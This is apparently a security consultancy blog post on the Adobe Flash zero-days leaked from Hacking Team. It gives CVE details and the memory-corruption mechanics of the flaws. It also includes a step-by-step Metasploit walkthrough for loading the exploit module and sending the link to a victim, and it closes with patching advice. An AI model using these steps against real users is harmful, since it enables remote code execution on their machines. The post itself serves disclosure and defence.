Hacking Team is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.Its “Remote Control Systems” enable governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and camera on target computers.Hacking Team states that they have the ability to disable their software if it is used unethically.
The Recent Cyber Attack that exposed 400GB of data belonging to Hacking Team has following Zero Day vulnerability in Adobe Flash Player in their data.
Let us see in detail , How these vulnerability affects the adobe flash player.
This Flash-based vulnerability, dubbed the “most beautiful Flash bug for the last four years” in Hacking Team’s internal notes,
Use-after-free vulnerability present in the ByteArray class located in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The critical zero-day vulnerability in Adobe Flash is a Use-After-Free() programming flaw (CVE-2015-5122) which is similar to the CVE-2015-5119.
Use-after-free vulnerability present in the DisplayObject class located in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that leverages improper handling of the opaqueBackground property.
“Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,” Adobe said.
Adobe credited FireEye researcher Dhanesh Kizhakkinan for reporting the vulnerability found in stolen data leaked from Hacking Team.
The flaw can be exploited by freeing a TextLine object within the valueOf function of a custom class when setting the TextLine’s opaqueBackground. As explained by FireEye researchers:
“Once the TextLine object is freed, a Vector object is allocated in its place. Returning from valueOf will overwrite the length field of Vector object with a value of 106. (Initial length is 98).
Exploitation continues by finding the corrupted Vector object by its length, which will be greater than 100.
This enables the object to change an adjacent Vector object’s length to 0x40000000.
Once exploit achieves this, it follows the same mechanism that was used in CVE-2015-5119 PoC.”
This, in turn, allows for attackers to execute shellcode, which pops up a calculator
Use-after-free vulnerability present in the BitmapData class located in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.302 on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The vulnerability can be triggered by the following steps:
1) From a new BitmapData object, prepare 2 Array objects, new 2 MyClass objects, and assign the MyClass object to each Array objects.
2 ) Once the valueOf function of MyClass is override, it calls the BitmapData.paletteMap with the 2 Array objects as parameters. The BitmapData.paletteMap will trigger the valueOf function.
3) In the valueOf function, it will call BitmapData.dispose() to dispose the underlying memory of BitmapData object, thus causing Flash Player to crash.
Steps to exploit flash zero day vulnerability with metasploit :
Note: This tutorial is for informational purposes only.
Adobe_Flash_HackingTeam_exploit.rb
Figure 2:Download the Exploit
/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf
Use the following command to copy the file from the root/desktop to the Metasploit framework modules folder (create the flash folder if it is not here):
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 3: Move the Exploit in exploit-Modules
ls /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 4: Confirm the destination folder
service postgresql start
service metasploit start
msfconsole
Figure 5: Start msfconsole
search hackingteam
After this use the following command to use the newly added exploit module:
use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit
Let’s check the options for Metasploit CVE-2015-5122 module with the following command:
show options
Exploit
Figure 7: Send the Link to the victim
CounterMeasures:
How to avoid getting infected by these exploits…
– Update Flash Player and make sure that it is up-to-date: https://get.adobe.com/flashplayer/
If you’re unsure whether your browser has Flash installed or what version it is running, you can browse to this link : https://www.adobe.com/software/flash/about/
– Install security patches if any and keep your OS updated.
– Keep your browser updated.
References:
https://cve.mitre.org/cgi-bin/cvename.cgi
https://www.adobe.com/software/flash/about/
Author:
Attack & PenTest Team,
Varutra Consulting
Introduction In the era of digitalization, data security has become a paramount concern. Every day,…
I.Introduction Bluetooth has become an integral technology for billions of smartphones, computers, wearables, and other…
I. Introduction In today's ever-evolving cybersecurity landscape, staying ahead of adversaries has become a challenge.…
Introduction In an increasingly interconnected world, the financial industry is becoming more vulnerable to cyber…
Introduction In today's interconnected world, where smartphones are an extension of our lives, ensuring the…
Introduction Unseen and unpredictable, zero-day threats loom as a constant menace to modern businesses. Detecting…